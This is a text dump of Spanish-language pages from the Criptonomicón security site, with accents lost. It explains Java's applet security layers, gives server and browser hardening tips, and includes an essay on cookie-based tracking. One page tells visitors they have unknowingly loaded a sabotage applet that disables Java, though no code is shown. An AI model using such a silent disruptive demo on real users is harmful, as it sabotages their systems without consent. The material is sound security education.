Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/nativos.html (2 of 2) [25/10/2000 02:31:51 p.m.]

Restriccin de creacin de ventanas en Java


Restricciones
Sistema de ficheros
Conexiones de red
Acceso al sistema
Manipulacin de threads
Mtodos nativos
Mensajes de alerta

Qu es Java

Barreras de seguridad

Agujeros

Lneas futuras

Cmo firmar applets

Consejos

Recursos

Restriccin de creacin de ventanas


Es evidente la razn por la cual a las ventanas creadas desde una applet se le aaden
una serie de advertencias acerca de su inseguridad. Si no existiese ninguna seal de
alerta, podran suplantar ventanas de aplicaciones locales de confianza, como la
conocidad ventana de Windows 95 NT que piden el nombre de usario y la
contrasea.
A pesar de todo el trabajo que se han tomado, existen maneras de engaar a Java,
como en los siguientes ejemplos de ventanas maliciosas.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/alertas.html [25/10/2000 02:31:51 p.m.]

Agujeros de seguridad de Java

Ejemplo de fallo de seguridad en Java


Suscripcin gratis

Intimidad?

Artculos

Seguridad

Aunque Java est diseado para evitar manipulaciones de threads, de hecho s que se
pueden toquetear, como hace esta applet que sin saberlo has cargado. A partir de
ahora, no se ejecutar ningn applet de Java y ni siquiera aparecer la ventanita
avisando de que no tienes Java activado, por lo que t ni siquiera te enteraras de que
ests pasando por pginas que incluyan applets. Te das cuenta de qu forma de
sabotaje? Algunos sitios confan en Java para mejorar la presentacin de sus pginas.
Desgraciadamente para ellos, despus de visitar esta pgina que ahora ests leyendo,
adis a Java.
Esta applet no funciona en las versiones modernas de los navegadores (4.x). Pero en
las antiguas, tiene efectos a veces impredecibles, como colgar el navegador.

Linux

Navegacin segura

Control de acceso

Si te ha desactivado el Java, puedes cerrar el navegador (no basta con cerrar esta
ventana) si quieres que de nuevo funcione Java. Perdona las molestias. Es el precio
del conocimiento.
Esta applet la he tomado de Mark LaDue.

CGI

Java

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/java/appletkiller/appletkiller.html (1 of 2) [25/10/2000 02:31:51 p.m.]

Agujeros de seguridad de Java


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/java/appletkiller/appletkiller.html (2 of 2) [25/10/2000 02:31:51 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/images/jdk102.jpg

file:///C|/TEMP/criptonomicon/criptonomicon/images/jdk102.jpg [25/10/2000 02:31:52 p.m.]

Caractersticas del lenguaje/compilador de Java

Qu es Java

Prohibido

Agujeros

Lneas futuras

Cmo firmar applets

Consejos

Caractersticas del
lenguaje/compilador

Modelo de las 4 capas


Lenguaje
Verificador
Cargador

Recursos

Java fue diseado con las siguientes ideas en mente:


Evitar errores de memoria
Imposibilitar acceso al SO
Evitar que caiga la mquina sobre la que corre

Gestor

Con el fin de llevar a la prctica estos objetivos, se implementaron las siguientes


caractersticas:
Ausencia de punteros
Protege frente a imitacin de objetos, violacin de encapsulacin, acceso a
reas protegidas de memoria, ya que el programador no podr referenciar
posiciones de memoria especficas no reservadas, a diferencia de lo que se
puede hacer en C y C++.
Gestin de memoria
Ya no se puede gestionar la memoria de forma tan directa como en C, (no hay
malloc). En cambio, se instancian objetos, no se reserva memoria
directamente (new siempre devuelve un handler), minimizando as la
interaccin del programador con la memoria y con el SO.
Recogida de basura
El programador ya no libera la memoria manualmente mediante free (fuente
muy comn de errores en C y C++, que posa llegar a producir el agotamiento
de la memoria del sistema). El recogedor de basura de Java se encarga de
reclamar la memoria usada por un objeto una vez que ste ya no es accesible o
desaparece. As, al ceder parte de la gestin de memoria a Java en vez de al
programador, se evitan las grietas de memoria (no reclamar espacio que ya no
es usado ms) y los punteros hurfanos (liberar espacio vlido antes de
file:///C|/TEMP/criptonomicon/criptonomicon/java/lenguaje.html (1 of 2) [25/10/2000 02:31:53 p.m.]

Caractersticas del lenguaje/compilador de Java

tiempo).
Arrays con comprobacin de lmites
En Java los arrays son objetos, lo cual les confiere ciertas funciones muy
tiles, como la comprobacin de lmites. Para cada subndice, Java comprueba
si se encuentra en el rango definido segn el nmero de elementos del array,
previniendo as que se referencien elementos fuera de lmite
Referencias a objetos fuertemente tipadas
Impide conversiones de tipo y castings para evitar accesos fuera de lmites de
memoria (resolucin en compilacin)
Casting seguro
Slo se permite casting entre ciertas primitivas de lenguaje (ints, longs) y entre
objetos de la misma rama del rbol de herencia (uno desciende del otro y no al
revs), en tiempo de ejecucin
Control de mtodos y variables de clases
Las variables y los mtodos declarados privados slo son accesibles por la
clase o subclases herederas de ella y los declarados como protegidos, slo por
la clase
Mtodos y clases final
Las clases y los mtodos (e incluso los datos miembro) declarados como
final no pueden ser modificados o sobrescritos. Una clase declarada final no
puede ser ni siquiera extendida.
Pero, qu ocurrira si modifico un compilador de C para producir cdigos de byte de
Java, pasando por alto todas las protecciones suministradas por el lenguaje y el
compilador de Java que acabamos de describir?
Con el fin de evitar esa forma de ataque, se construy la segunda lnea de defensa, el
verificador de cdigo de bytes.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/lenguaje.html (2 of 2) [25/10/2000 02:31:53 p.m.]

Verificador de Cdigos de Bytes de Java

Qu es Java

Prohibido

Agujeros

Lneas futuras

Cmo firmar applets

Consejos

Recursos

Verificador de Cdigos de Bytes

Modelo de las 4 capas

Slo permite ejecutar cdigo de bytes de programas Java vlidos,


buscando intentos de:
fabricar punteros,
ejecutar instrucciones en cdigo nativo,
llamar a mtodos con parmetros no vlidos,
usar variables antes de inicializarlas,
etc.

Verificador

Lenguaje

Cargador
Gestor

El verificador efecta cuatro pasadas sobre cada fichero de clase:


En la primera, se valida el formato del fichero
En la segunda, se comprueba que no se instancien subclases de clases final
En la tercera, se verifica el cdigo de bytes: la pila, registros, argumentos de
mtodos, opcodes
En la cuarta, se finaliza el proceso de verificacin, realizndose los ltimos
tests
Si el verificador aprueba un fichero .class, se le supone que cumple ya con las
siguientes condiciones:
Acceso a registros y memoria vlidos
No hay overflow o underflow de pila
Consistencia de tipo en parmetros y valores devueltos
No hay conversiones de tipos ni castings ilegales
Aunque estas comprobaciones sucesivas deberan garantizar que slo se ejecutarn
applets legales, qu pasara si la applet carga una clase propia que reemplace a otra
crtica del sistema, p.e. SecurityManager?

file:///C|/TEMP/criptonomicon/criptonomicon/java/verificador.html (1 of 2) [25/10/2000 02:31:53 p.m.]

Verificador de Cdigos de Bytes de Java

Para evitarlo, se erigi la tercera lnea defensa, el cargador de clases.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/verificador.html (2 of 2) [25/10/2000 02:31:53 p.m.]

Cargador de Clases de Java

Qu es Java

Prohibido

Agujeros

Lneas futuras

Cmo firmar applets

Consejos

Recursos

Cargador de Clases

Modelo de las 4 capas

A la hora de ejecutarse las applets en nuestra mquina, se


consideran tres dominios con diferentes niveles de seguridad:
La mquina local (el ms seguro)
La red local guardada por el firewall (seguro)
La Internet (inseguro)

Lenguaje
Verificador
Cargador
Gestor

En este contexto, no se permite a una clase de un domino de seguridad inferior


sustituir a otra de un dominio superior, con el fin de evitar que una applet cargue una
de sus clases para reemplazar una clase crtica del sistema, soslayando as las
restricciones de seguridad de esa clase.
Este tipo de ataque se imposibilita asignando un espacio de nombres distinto para
clases locales y para clases cargadas de la Red. Siempre se accede antes a las clases
del sistema, en vez de a clases del mismo nombre cargadas desde una applet.
Adems, las clases de un dominio no pueden acceder mtodos no pblicos de clases
de otros dominios.
Aun as, sera posible que algn recurso del sistema resultase fcilmente accesible
por cualquier clase?
Para evitarlo, se cre la cuarta lnea de defensa, el gestor de seguridad.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/cargador.html [25/10/2000 02:31:53 p.m.]

Gestor de Seguridad de Java

Qu es Java

Prohibido

Agujeros

Lneas futuras

Cmo firmar applets

Consejos

Recursos

Gestor de Seguridad
La gestin de seguridad la realiza la clase abstracta
SecurityManager, que limita lo que las applets pueden o no
hacer. Para prevenir que sea modificada por una applet maliciosa,
no puede ser extendida por las applets.

Modelo de las 4 capas


Lenguaje
Verificador
Cargador
Gestor

Entre sus funciones de vigilancia, se encuentran el asegurar que las applets no


acceden al sistema de ficheros, no abren conexiones a travs de Internet, no acceden
al sistema, etc.
Para ello, va a introducir una serie de restricciones de seguridad o prohibiciones.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/gestor.html [25/10/2000 02:31:53 p.m.]

Funcionamiento de Java

Barreras de seguridad

Prohibido

Agujeros

Lneas futuras

Cmo firmar applets

Consejos

Recursos

Funcionamiento de Java
El fichero de cdigo fuente puede ser escrito meidante cualquier
editor ascii convencional o, para mayor comodidad, con el editor
suministrado con el paquete del lenguaje Java.

Caractersticas de Java
Cmo funciona

Una vez creado el fichero .java con el cdigo del programa, se compila, generndose
un fichero intermedio con los bytecodes, de extensin .class.
Una vez generado el fichero .class, ste ya puede ser interpretado en cualquier
mquina virtual de Java. Tratndose de applets, este fichero se descargar
tpicamente desde la Red. Para indicrselo al navegador se utilizan unas etiquetas
especiales del lenguaje HTML:
<APPLET attributes>
applet_parameters
alternate_content
</APPLET>
Esta pgina Web en la que se encuentra embebida la applet la habremos bajado desde
la Red o bien la hemos cargado desde el disco duro. En cualquier caso, para ver la
applet funcionando hace falta un navegador capaz de ejecutar Java, como los muy
conocidos Netscape y Microsoft Internet Explorer.
El navegador carga las clases especificadas en la etiqueta <applet> dinmicamente, a
medida que van siendo necesitadas y se les pasa al cdigo fuente (a los bytecodes) el
verificador de cdigo de bytes.
Ahora ser ya la mquina virtual de Java la que vaya interpretando los bytecodes y
generando las instrucciones para su propia arquitectura.
Este funcionamiento se puede ver esquemticamente en la figura.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/funcionamiento.html [25/10/2000 02:31:54 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/images/funcionamiento.gif

file:///C|/TEMP/criptonomicon/criptonomicon/images/funcionamiento.gif [25/10/2000 02:31:54 p.m.]

Cmo evitar los volcados de memoria

Consejos para
administradores
Consejos para
usuarios

Cmo evitar los volcados de memoria


Todos los programadores en sistemas tipo Unix estn acostumbrados a los volcados
de memoria, los "core dumps", cuando falla la ejecucin del programa en C sobre el
que estn trabajando, generalmente por problemas de punteros y errores de acceso a
memoria. Esta caracterstica resulta muy til, ya que el fichero "core" generado
contiene informacin valiosa sobre el estado de la memoria cuando se produjo el
error fatal. Ahora bien, dado que la memoria puede contener en un momento dado
informacin valiosa sobre ficheros o procesos en los que se est trabajando en ese
momento, esta informacin volcada en el fichero core tambin puede contener datos
confidenciales, especialmente si el programa que se "colg" y gener el fichero core
corran con privilegios de root, como por ejemplo datos del fichero de contraseas en
la sombra (v. boletn #46, art. 6).
Para evitar estos volcados, se puede editar el fichero
/etc/security/limits.conf, aadiendo la lnea:
*

hard

core

donde el primer argumento indica el dominio de aplicacin, que puede ser un


usuario, un grupo, o general (*); el segundo argumento indica el tipo de restriccin,
dura (hard) o blanda (soft); el tercero, lo que se quiere restrinir, en este caso, los
volcados (core); el ltimo argumento especifica el valor del argumento anterior, en
este caso, 0 Kbytes.
El propio fichero /etc/security/limits.conf contiene instrucciones y
ejemplos sobre su manejo.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/coredumps.html [25/10/2000 02:31:55 p.m.]

Limpie su servidor web de ejemplos intiles

Consejos para
administradores
Consejos para
usuarios

Limpie su servidor web de ejemplos


intiles
Cuando se instala el software de servidor web, por defecto se crean una serie de
directorios en los que ste a menudo almacena ejemplos de programas en cgi, server
side includes o php (por ejemplo, para mquinas Linux con servidores tipo NCSA), o
ejemplos en ISAPI o ASP (en servidores Windows NT con IIS), mdulos en perl,
etc. Estos ejemplos sirven bsicamente a dos propsitos:
Comprobar que la instalacin del servidor se ha completado con xito y que se
pueden ejecutar programas para creacin dinmica de pginas web.
Servir de gua de referencia al programador, que puede usar los ejemplos
suministrados por defecto con el servidor para desarrollar a partir de ellos sus
propias aplicaciones o simplemente aprender cmo se realiza alguna accin
concreta.
Ahora bien, en contra de lo que pudiera pensarse a primera vista, resulta muy
peligroso conservar esos ejemplos en el servidor en el directorio asignado por
defecto, ya que pueden ser explotados por un atacante para entrar en el servidor. No
olvide que:
Cualquier otra persona conoce la localizacin exacta en su servidor de los
programas de demostracin.
Los cdigos fuente suelen acompaar a los programas de ejemplo, por lo que
pueden ser examinados a fondo por cualquiera en busca de agujeros.
Si se descubriera una vulnerabilidad en alguno de ellos, podra ser vctima fcil de un
ataque. Por lo tanto, si no pretende desarrollar aplicaciones o no piensa aprender con
esos ejemplos, lo mejor que puede hacer es borrarlos de su servidor en cuanto haya
comprobado que todos los servicios funcionan correctamente. En el caso de que le
sirvan como referencia de trabajo, muvalos de sitio, de manera que no estn
disponibles a travs de Internet. Si no desea borrarlos ni trasladarlos de ubicacin,
cmbieles al menos los permisos, de manera que no pueda ejecutarlos ningn usuario
que no sea Ud. o algn otro perteneciente a un grupo reducido de confianza.
Recuerde, cuantos ms programas intiles cuelguen de su servidor, mayores
oportunidades ofrecer a atacantes potenciales.
Participa con tus consejos y trucos

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/ejemplos.html (1 of 2) [25/10/2000 02:31:55 p.m.]

Limpie su servidor web de ejemplos intiles

Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/ejemplos.html (2 of 2) [25/10/2000 02:31:55 p.m.]

Cmo no recordar contraseas en Internet Explorer

Consejos para
administradores
Consejos para
usuarios

Cmo no recordar contraseas en


Internet Explorer
Internet Explorer 5.0 incorpora la posibilidad de recordar los campos que se rellenan
en un formulario, incluidas las contraseas. Esta caracterstica, que puede resultar
muy cmoda para una persona que es la nica usuaria de un ordenador, abre un
importante problema de seguridad cuando son varios los usuarios que navegan desde
la misma cuenta en el ordenador.
Cuando un usuario visita una pgina en la que se le pide login y password, tras
haberlos introducido, le aparecer una ventana en la que se le pregunta si desea que
Windows recuerde la contrasea para no tener que escribirla la prxima vez que
visite esa pgina. En caso afirmativo, quedar almacenada de forma codificada en el
registro de configuraciones de Windows, de manera, que en el futuro, cada vez que
se acceda a la misma pgina, se rellener la contrasea automticamente. Para
usuarios que se conectan a multitud de servicios de Internet, esta funcionalidad
adicional puede simplificarles terriblemente la vida, en la medida en que no necesitan
recordar docenas de contraseas distintas. Sin embargo, si otro usuario navegando
desde su misma cuenta accediera a esa pgina, automticamente recibira permiso
para acceder a ella.

Qu puede hacer el usuario


En primer lugar, en la ventana que se le presenta debe contestar que no lo desea y
activar la casilla "No volver a ofrecer recordar contraseas".
Si esta funcionalidad ya est activada, puede borrar todas las contraseas y desactivar
la caracterstica en Herramientas --> Opciones de Internet... --> Contenido -->
Autocompletar... .

Qu puede hacer el administrador


Como un creador de pginas web no puede prever lo que harn los potenciales
visitantes, ms vale asegurarse de que no ocurrirn sorpresas. Puede desactivar la
posibilidad de Autocompletar aadiendo el atributo AUTOCOMPLETE="OFF" a la
etiqueta <FORM>:
<FORM METHOD="POST" ACTION="ENVIAR.ASP"
file:///C|/TEMP/criptonomicon/criptonomicon/consejos/autocompletar.html (1 of 2) [25/10/2000 02:31:55 p.m.]

Cmo no recordar contraseas en Internet Explorer

AUTOCOMPLETE="OFF">
En el caso de que slo se quiera desactivar el autocompletado en algunos campos
ms comprometidos del formulario y no en todos, puede utilizarse ese mismo
atributo en las etiquetas de los campos, por ejemplo:
<INPUT TYPE="PASSWORD" NAME="CLAVE" SIZE="15"
MAXLENGTH="15" AUTOCOMPLETE="OFF">
que desactivar autocompletar solamente en ese campo en concreto.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/autocompletar.html (2 of 2) [25/10/2000 02:31:55 p.m.]

Cmo activar SSL en tu servidor web

Consejos para
administradores
Consejos para
usuarios

Cmo activar SSL en tu servidor web


Si deseas ofrecer comunicaciones seguras a los visitantes de tus pginas web con un
canal SSL debers antes solicitar e instalar un certificado de servidor, como se
explic en Cmo instalar SSL en un servidor. Pero no basta con tenerlo instalado,
debers hacer algunas modificaciones en la configuracin del servidor para que SSL
quede efectivamente activado.

Cmo se hace en Linux (servidores tipo Apache)


En primer lugar, se debe especificar el puerto para conexiones SSL. En el fichero de
configuracin httpd.conf se deben aadir, entre otras, las siguiente directivas:
Listen 443 <VirtualHost www.nombrehost.es:443> SSLFlag on </VirtualHost>
A continuacin, para aquellos directorios o ficheros en los que se desee un canal
seguro cuando sean accedidos, se puede incluir la lnea RequireSSL on en la
directiva Directory o Files correspondiente.
<Directory "camino del directorio a proteger"> RequireSSL on </Directory>
De esta forma no se mostrar la pgina o fichero si su direccin no va precedida de
https://, en cuyo caso la transmisin ser a travs de un canal protegido con SSL.
Normalmente se utilizar esta posibilidad para proteger formularios que transmitan
informacin confidencial del cliente.

Cmo se hace en NT (Internet Information Server 5.0)


En primer lugar, se debe especificar el puerto para conexiones SSL. Abre Internet
Information Services y en las propiedades del web, en la pestaa Web Site, introduce
el 443 como SSL Port. A continuacin, para aquellos directorios o ficheros en los
que desees que sea obligatorio utilizar una conexin SSL, examina sus propiedades y
en la pestaa Directory Security (para directorios) o File Security (para archivos o
programas) pulsa el botn Edit... bajo Secure communitations. En la nueva ventana
que aparece, activa Require Secure Channel (SSL), lo que obligar en el futuro a que
esa conexin slo pueda establecerse a travs de un canal seguro (la direccin de ese
recurso deber ir precedida, por tanto, de https://, para que sea accesible).
Participa con tus consejos y trucos

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/activarssl.html (1 of 2) [25/10/2000 02:31:56 p.m.]

Cmo activar SSL en tu servidor web

Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/activarssl.html (2 of 2) [25/10/2000 02:31:56 p.m.]

Sociedad de la Informacin o Sociedad de la Vigilancia?

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Sociedad de la Informacin o Sociedad de la


Vigilancia?
Desde que las cookies hicieran su aparicin en la arena de Internet, se han
visto permanentemente envueltas en la polmica, atrayendo un inters
anormalmente desmesurado en los medios. Se las asocia comnmente con
amenazas a la intimidad, violacin de la privacidad y peligros a veces ms
terribles.
A pesar de que los grupos de anunciantes y de marketing mantienen una
guerra particular con ciertas organizaciones, que por su parte promueven
campaas de proteccin de la intimidad en la Red, lo cierto es que las
cookies continan utilizndose extensivamente en todo tipo de sitios web y la
tendencia apunta a que su uso crecer con el tiempo.

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Las cookies constituyen una potente herramienta empleada por los


servidores web para almacenar y recuperar informacin acerca de sus
visitantes: conservan informacin entre pginas sucesivas que visita el
usuario, extendiendo significativamente las capacidades de las aplicaciones
cliente/servidor basadas en la Web. Mediante el uso de cookies se permite al
servidor recordar algunos datos concernientes al usuario, como sus
preferencias para la visualizacin de las pginas de ese servidor, nombre y
contrasea, productos que ms le interesan o, simplemente, un identificador
nico.
Pero qu es exactamente una cookie? Una cookie no es ms que un
fichero de texto simple que algunos servidores piden a nuestro navegador
que escriba en nuestro disco duro. El contenido de la cookie lo dicta el
servidor y normalmente consistir en un nmero para identificar
unvocamente al visitante. Este nmero se utiliza como ndice en una gran
base de datos, en la que se va almacenando la mayor cantidad posible de
informacin acerca de lo que el visitante ha estado haciendo por sus
pginas: qu enlaces sigue, qu pginas lee, qu fotos mira, qu
documentos o programas descarga, etc. De esta forma, si el usuario apaga

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros19.html (1 of 4) [25/10/2000 02:32:00 p.m.]

Sociedad de la Informacin o Sociedad de la Vigilancia?


Consejos prcticos

Referencias

el ordenador y se conecta de nuevo al da siguiente, la cookie permitir


identificarle, reconocindole como el mismo usuario del da anterior, con lo
que se puede continuar recabando informacin acerca de l. La cookie acta
como esos anillos que se pone a los pjaros en la patita, para poder seguir
sus movimientos y migraciones.

Libro de Visitas

En s, esta tcnica no parece muy preocupante. De hecho, cuando visitemos


sitios que nos han enviado cookies, recibiremos propaganda cada vez ms
personanalizada, ya que el anunciante va conociendo con gran precisin
nuestros hbitos y gustos, lo cual puede resultar deseable. Y al fin y al cabo,
slo nos conocen por un nmero, no por nombre y apellidos.
Desgraciadamente, a menudo se rellenan formularios con el nombre,
apellidos, direccin, telfono y a veces incluso datos an ms privados y
sensibles. A partir de ese momento, si el formulario se enva a un sitio del
que hemos recibido una cookie, la asociacin entre el identificador annimo
de la cookie y nuestros datos personales, introducidos en el formulario,
resulta inmediata. De ah en adelante ya no es un nmero el que navega,
sino un ciudadano con su nombre y domicilio.
El reciente anuncio de Kevin O'Connor, fundador y presidente de
DoubleClick, la mayor red de anunciantes y envo de cookies para marketing
personalizado, ha provocado un gran revuelo en los crculos defensores de
la intimidad en Internet: segn sus palabras, DoubleClick planea cruzar la
informacin recopilada en Internet (on-line), a travs de cookies y
formularios, con la informacin recopilada por otras compaas al margen de
la Red (off-line).
Ahora el panorama s que empieza a perfilarse como un escenario
Orwelliano, en el que se siguen a conciencia todos los movimientos de los
ciudadanos en un mundo que camina hacia la informatizacin y
automatizacin progresiva de todos los procesos. Cada da se hace un
mayor uso de tarjetas, de crdito y de todo tipo: la tarjeta Caprabo para
ganar puntos para descuentos mensuales en las compras del supermercado,
la tarjeta VIPS para ahorrar dinero VIPS y obtener descuentos en comidas y
cenas, la tarjeta del Corte Ingls, la tarjeta de Repsol, la tarjeta de
MasterCard gratuita que distribuye la compaa elctrica entre sus clientes,
las tarjetas de crdito y dbito habituales con las que se compra en cualquier
tienda o se reservan entradas para el prximo concierto o se paga la
habitacin del hotel. Hay tarjetas para todo y las tarjetas Visa, AMEX y
MasterCard cada vez se usan en ms y ms pagos. El peaje electrnico est
a la vuelta de la esquina, funcionando ya en muchos pases; se registran
todas las llamadas desde mvil y fijo: a qu nmero se llam, cunto tiempo
dur la llamada.
Nunca ha pensado que queda un registro electrnico de todas sus compras
y servicios pagados con esa multitud de tarjetas? La facilidad de tratamiento
masivo de la informacin que ofrecen los modernos sistemas informticos,

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros19.html (2 of 4) [25/10/2000 02:32:00 p.m.]

Sociedad de la Informacin o Sociedad de la Vigilancia?

unida a la fcil movilidad de los datos, gracias a las redes de


comunicaciones cada da ms extendidas, posibilitan la compilacin de
gigantescos historiales sobre la vida personal de los ciudadanos: hbitos de
compra, gustos musicales, destinos de viaje preferidos, lecturas favoritas,
alimentacin, tantas cosas que pueden llegar a conocerse a partir del uso
que hace de sus tarjetas.
Nuestra vida moderna deja una profunda huella digital, de la que creamos
que podamos escapar en Internet, donde no nos vemos las caras, por
donde navegamos desde la comodidad y aparente anonimato de nuestros
hogares. El anuncio de O'Connor derriba incluso esta quimera. Ambos
rastros, el de Internet y el del mundo cotidiano, pueden combinarse y
DoubleClick, la mayor red de marketing en Internet, que incluye ms de 1500
sitios, entre los que se cuentan Altavista, The Wall Street Journal o The New
York Times, ha anunciado sus planes de hacerlo realidad. Los mundos
on-line y off-line, una vez relacionados, pueden ofrecer tal cantidad de
informacin acerca del usuario, que ser necesario revisar los conceptos
actuales de privacidad y anonimato. Internet y el rpido avance de las
tecnologas de la informacin y comunicaciones claman por una
reestructaracin de nuestra tica en el mbito del ciberespacio, sacudida ya
por la conducta escandalosa de los nuevos ciber-ricos.
Como sostiene Lawrence Lessig en su pesimista libro "Code and Other Laws
of Cyberspace", pronto una combinacin de contraseas, filtros, cookies,
identificadores digitales, libros y materiales de pago mientras se contemplan
("pay as you view downloadable books") pueden transformar Internet en un
lugar oscuro, donde los instrumentos actuales de libertad y privacidad
pueden ser borrados por una emergente arquitectura de ojos que todo lo
ven.
Como siempre, la ltima palabra la tiene el usuario, que debe exigir a los
sitios web que visite una clara poltica de privacidad, que se le explique
llanamente qu se hace con sus datos personales y se le ofrezca siempre la
posibilidad de entregarlos solamente si quiere. En vez de seguir el esquema
actual de obtener datos y ofrecer luego al usuario la posibilidad de darse de
baja (opt-out), tiene ms sentido el proporcionarle la posibilidad de
suministrar sus datos personales slo si as lo desea, cuando se le haya
explicado por qu se solicitan y qu ventajas le reportar entregarlos (opt-in).
Un enfoque racional y flexible del uso y recogida de datos personales en
Internet puede conducir a una Sociedad de la Informacin en la que todos
ganamos. El usuario debe gozar del control sobre sus datos y decidir a quin
se los entrega. Si las empresas de marketing y de venta de servicios y
mercancas en la Red se niegan sistemticamente a ceder el control a los
ciudadanos, no queda ms remedio que recurrir a herramientas para
asegurar la privacidad y el anonimato. Afortunadamente, existen numerosas
herramientas para restringir el uso de las cookies y el rastreo de los
navegantes y para ocultar la identidad.
file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros19.html (3 of 4) [25/10/2000 02:32:00 p.m.]

Sociedad de la Informacin o Sociedad de la Vigilancia?

En cualquier caso, el primer paso hacia una sociedad digital responsable y


no controlada por el poder econmico o social es que los ciudadanos tomen
conciencia de que sus datos son recopilados y comprendan los procesos por
los que esta acumulacin de informacin tienen lugar. Cmo va a
reaccionar un ciudadano desinformado que ni siquiera sabe que sus datos
personales son almacenados con fines desconocidos? La informacin
representa la delgada lnea entre manipulacin y libertad.
Publicado en el Boletn del Criptonomicn #68.

Informacin adicional

Todo sobre las cookies

Listas Robinson

